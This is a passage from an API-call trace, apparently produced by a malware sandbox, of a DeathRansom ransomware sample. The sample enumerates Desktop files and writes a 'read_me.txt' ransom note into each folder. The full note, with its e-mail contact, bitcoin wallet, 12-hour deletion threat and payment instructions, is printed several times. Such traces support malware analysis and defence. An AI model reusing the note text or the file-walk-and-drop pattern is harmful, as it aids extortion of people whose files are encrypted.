pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw\\-sIkef49wnJO.bmp") returned 106 [0075.247] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc84580, ftCreationTime.dwHighDateTime=0x1d4cf98, ftLastAccessTime.dwLowDateTime=0xd493cc90, ftLastAccessTime.dwHighDateTime=0x1d4c828, ftLastWriteTime.dwLowDateTime=0xd493cc90, ftLastWriteTime.dwHighDateTime=0x1d4c828, nFileSizeHigh=0x0, nFileSizeLow=0xaf65, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="eW2I.m4a", cAlternateFileName="")) returned 1 [0075.247] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw\\eW2I.m4a") returned 98 [0075.247] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x817aeab0, ftCreationTime.dwHighDateTime=0x1d4d314, ftLastAccessTime.dwLowDateTime=0xb8f0b330, ftLastAccessTime.dwHighDateTime=0x1d4ce1e, ftLastWriteTime.dwLowDateTime=0xb8f0b330, ftLastWriteTime.dwHighDateTime=0x1d4ce1e, nFileSizeHigh=0x0, nFileSizeLow=0x4f77, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fX4UaGBV46vnDsIHXb.gif", cAlternateFileName="FX4UAG~1.GIF")) returned 1 [0075.247] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw\\fX4UaGBV46vnDsIHXb.gif") returned 112 [0075.247] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3edca970, ftCreationTime.dwHighDateTime=0x1d4d2d6, ftLastAccessTime.dwLowDateTime=0x58e6eb80, ftLastAccessTime.dwHighDateTime=0x1d4ce6e, ftLastWriteTime.dwLowDateTime=0x58e6eb80, ftLastWriteTime.dwHighDateTime=0x1d4ce6e, nFileSizeHigh=0x0, nFileSizeLow=0x6cb5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="R-vKwcM20r5mYO.flv", cAlternateFileName="R-VKWC~1.FLV")) returned 1 [0075.248] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw\\R-vKwcM20r5mYO.flv") returned 108 [0075.248] FindNextFileW (in: hFindFile=0x7cfea28, lpFindFileData=0x17d318 | out: lpFindFileData=0x17d318*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3edca970, ftCreationTime.dwHighDateTime=0x1d4d2d6, ftLastAccessTime.dwLowDateTime=0x58e6eb80, ftLastAccessTime.dwHighDateTime=0x1d4ce6e, ftLastWriteTime.dwLowDateTime=0x58e6eb80, ftLastWriteTime.dwHighDateTime=0x1d4ce6e, nFileSizeHigh=0x0, nFileSizeLow=0x6cb5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="R-vKwcM20r5mYO.flv", cAlternateFileName="R-VKWC~1.FLV")) returned 0 [0075.248] FindClose (in: hFindFile=0x7cfea28 | out: hFindFile=0x7cfea28) returned 1 [0075.248] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw\\read_me.txt") returned 101 [0075.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4aqclz9qavwtjc5qkbv\\j9-mn6\\ofbsljmg5f yphpxq3lw\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x764 [0075.248] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.248] WriteFile (in: hFile=0x764, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17d57c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17d57c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.249] CloseHandle (hObject=0x764) returned 1 [0075.249] GetProcessHeap () returned 0x4f10000 [0075.249] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b900d0 | out: hHeap=0x4f10000) returned 1 [0075.249] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d590 | out: lpFindFileData=0x17d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a309220, ftCreationTime.dwHighDateTime=0x1d4ca67, ftLastAccessTime.dwLowDateTime=0xfe22dc10, ftLastAccessTime.dwHighDateTime=0x1d4cd67, ftLastWriteTime.dwLowDateTime=0xfe22dc10, ftLastWriteTime.dwHighDateTime=0x1d4cd67, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ofbsljmg5f yphpxq3lw", cAlternateFileName="OFBSLJ~1")) returned 0 [0075.249] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0075.249] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\read_me.txt") returned 80 [0075.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4aqclz9qavwtjc5qkbv\\j9-mn6\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b8 [0075.250] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.250] WriteFile (in: hFile=0x7b8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17d7f4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17d7f4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.250] CloseHandle (hObject=0x7b8) returned 1 [0075.251] GetProcessHeap () returned 0x4f10000 [0075.251] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b700c0 | out: hHeap=0x4f10000) returned 1 [0075.251] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f567940, ftCreationTime.dwHighDateTime=0x1d4ce82, ftLastAccessTime.dwLowDateTime=0xa5f25640, ftLastAccessTime.dwHighDateTime=0x1d4cf76, ftLastWriteTime.dwLowDateTime=0xa5f25640, ftLastWriteTime.dwHighDateTime=0x1d4cf76, nFileSizeHigh=0x0, nFileSizeLow=0x68d7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MymW-P0.gif", cAlternateFileName="")) returned 1 [0075.251] wnsprintfW (in: pszDest=0x8b500b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\MymW-P0.gif") returned 73 [0075.251] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f567940, ftCreationTime.dwHighDateTime=0x1d4ce82, ftLastAccessTime.dwLowDateTime=0xa5f25640, ftLastAccessTime.dwHighDateTime=0x1d4cf76, ftLastWriteTime.dwLowDateTime=0xa5f25640, ftLastWriteTime.dwHighDateTime=0x1d4cf76, nFileSizeHigh=0x0, nFileSizeLow=0x68d7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MymW-P0.gif", cAlternateFileName="")) returned 0 [0075.251] FindClose (in: hFindFile=0x7cfe9a8 | out: hFindFile=0x7cfe9a8) returned 1 [0075.251] wnsprintfW (in: pszDest=0x8b500b0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\read_me.txt") returned 73 [0075.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4aqclz9qavwtjc5qkbv\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b4 [0075.253] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.253] WriteFile (in: hFile=0x7b4, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.254] CloseHandle (hObject=0x7b4) returned 1 [0075.254] GetProcessHeap () returned 0x4f10000 [0075.254] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b500b0 | out: hHeap=0x4f10000) returned 1 [0075.254] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b0dce50, ftCreationTime.dwHighDateTime=0x1d4d34a, ftLastAccessTime.dwLowDateTime=0xc337220, ftLastAccessTime.dwHighDateTime=0x1d4c5ce, ftLastWriteTime.dwLowDateTime=0xc337220, ftLastWriteTime.dwHighDateTime=0x1d4c5ce, nFileSizeHigh=0x0, nFileSizeLow=0x7eb, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="aEefa7T.jpg", cAlternateFileName="")) returned 1 [0075.254] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEefa7T.jpg") returned 53 [0075.254] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x982eb590, ftCreationTime.dwHighDateTime=0x1d4cbc9, ftLastAccessTime.dwLowDateTime=0xf9cfd370, ftLastAccessTime.dwHighDateTime=0x1d4cfc9, ftLastWriteTime.dwLowDateTime=0xf9cfd370, ftLastWriteTime.dwHighDateTime=0x1d4cfc9, nFileSizeHigh=0x0, nFileSizeLow=0x9c37, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="cKQ4LePz.wav", cAlternateFileName="")) returned 1 [0075.254] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cKQ4LePz.wav") returned 54 [0075.254] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4506b850, ftCreationTime.dwHighDateTime=0x1d4c7ea, ftLastAccessTime.dwLowDateTime=0xec4b9c20, ftLastAccessTime.dwHighDateTime=0x1d4cab0, ftLastWriteTime.dwLowDateTime=0xec4b9c20, ftLastWriteTime.dwHighDateTime=0x1d4cab0, nFileSizeHigh=0x0, nFileSizeLow=0x1a1d, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="CQoYWdLDE8A.flv", cAlternateFileName="CQOYWD~1.FLV")) returned 1 [0075.254] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CQoYWdLDE8A.flv") returned 57 [0075.254] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0075.254] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned 53 [0075.254] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x855b97b0, ftCreationTime.dwHighDateTime=0x1d4d19d, ftLastAccessTime.dwLowDateTime=0x7a095250, ftLastAccessTime.dwHighDateTime=0x1d4cd86, ftLastWriteTime.dwLowDateTime=0x7a095250, ftLastWriteTime.dwHighDateTime=0x1d4cd86, nFileSizeHigh=0x0, nFileSizeLow=0x13eb6, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ebB_pHirOaSct0.swf", cAlternateFileName="EBB_PH~1.SWF")) returned 1 [0075.254] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ebB_pHirOaSct0.swf") returned 60 [0075.254] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ce201b0, ftCreationTime.dwHighDateTime=0x1d4d473, ftLastAccessTime.dwLowDateTime=0x616ca880, ftLastAccessTime.dwHighDateTime=0x1d4cbe4, ftLastWriteTime.dwLowDateTime=0x616ca880, ftLastWriteTime.dwHighDateTime=0x1d4cbe4, nFileSizeHigh=0x0, nFileSizeLow=0xb0ab, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="F0klApUO2Z.odp", cAlternateFileName="F0KLAP~1.ODP")) returned 1 [0075.254] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\F0klApUO2Z.odp") returned 56 [0075.254] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3aace270, ftCreationTime.dwHighDateTime=0x1d4cdf4, ftLastAccessTime.dwLowDateTime=0x6722280, ftLastAccessTime.dwHighDateTime=0x1d4d2af, ftLastWriteTime.dwLowDateTime=0x6722280, ftLastWriteTime.dwHighDateTime=0x1d4d2af, nFileSizeHigh=0x0, nFileSizeLow=0xccd3, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="gkzqpiiCf f.bmp", cAlternateFileName="GKZQPI~1.BMP")) returned 1 [0075.254] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gkzqpiiCf f.bmp") returned 57 [0075.254] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x811a0, ftCreationTime.dwHighDateTime=0x1d4d4cd, ftLastAccessTime.dwLowDateTime=0x4a2c98d0, ftLastAccessTime.dwHighDateTime=0x1d4cc00, ftLastWriteTime.dwLowDateTime=0x4a2c98d0, ftLastWriteTime.dwHighDateTime=0x1d4cc00, nFileSizeHigh=0x0, nFileSizeLow=0xde73, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="h-5QryXhtlv.jpg", cAlternateFileName="H-5QRY~1.JPG")) returned 1 [0075.254] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-5QryXhtlv.jpg") returned 57 [0075.255] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96ffb9c0, ftCreationTime.dwHighDateTime=0x1d4d390, ftLastAccessTime.dwLowDateTime=0x66e781a0, ftLastAccessTime.dwHighDateTime=0x1d4d00c, ftLastWriteTime.dwLowDateTime=0x66e781a0, ftLastWriteTime.dwHighDateTime=0x1d4d00c, nFileSizeHigh=0x0, nFileSizeLow=0xe4c6, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LBVX9 jMA_nh7r1-t.mp3", cAlternateFileName="LBVX9J~1.MP3")) returned 1 [0075.255] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LBVX9 jMA_nh7r1-t.mp3") returned 63 [0075.255] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b991d60, ftCreationTime.dwHighDateTime=0x1d4cd89, ftLastAccessTime.dwLowDateTime=0x71256b00, ftLastAccessTime.dwHighDateTime=0x1d4c855, ftLastWriteTime.dwLowDateTime=0x71256b00, ftLastWriteTime.dwHighDateTime=0x1d4c855, nFileSizeHigh=0x0, nFileSizeLow=0x14f31, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Lu8 o.swf", cAlternateFileName="LU8O~1.SWF")) returned 1 [0075.255] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Lu8 o.swf") returned 51 [0075.255] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdb600, ftCreationTime.dwHighDateTime=0x1d4c708, ftLastAccessTime.dwLowDateTime=0x8c817450, ftLastAccessTime.dwHighDateTime=0x1d4cae6, ftLastWriteTime.dwLowDateTime=0x8c817450, ftLastWriteTime.dwHighDateTime=0x1d4cae6, nFileSizeHigh=0x0, nFileSizeLow=0x64d0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Ob 7JY7fuAZ.flv", cAlternateFileName="OB7JY7~1.FLV")) returned 1 [0075.255] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ob 7JY7fuAZ.flv") returned 57 [0075.255] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23636730, ftCreationTime.dwHighDateTime=0x1d4c75d, ftLastAccessTime.dwLowDateTime=0x403ad320, ftLastAccessTime.dwHighDateTime=0x1d4c64f, ftLastWriteTime.dwLowDateTime=0x403ad320, ftLastWriteTime.dwHighDateTime=0x1d4c64f, nFileSizeHigh=0x0, nFileSizeLow=0x15284, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="P6r6WVfc_j6IN62 yp.gif", cAlternateFileName="P6R6WV~1.GIF")) returned 1 [0075.255] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\P6r6WVfc_j6IN62 yp.gif") returned 64 [0075.255] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd52671d0, ftCreationTime.dwHighDateTime=0x1d4c5c6, ftLastAccessTime.dwLowDateTime=0xdf4583b0, ftLastAccessTime.dwHighDateTime=0x1d4d2b7, ftLastWriteTime.dwLowDateTime=0xdf4583b0, ftLastWriteTime.dwHighDateTime=0x1d4d2b7, nFileSizeHigh=0x0, nFileSizeLow=0x152bc, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pdxnl.bmp", cAlternateFileName="")) returned 1 [0075.255] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pdxnl.bmp") returned 51 [0075.255] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc13f9be0, 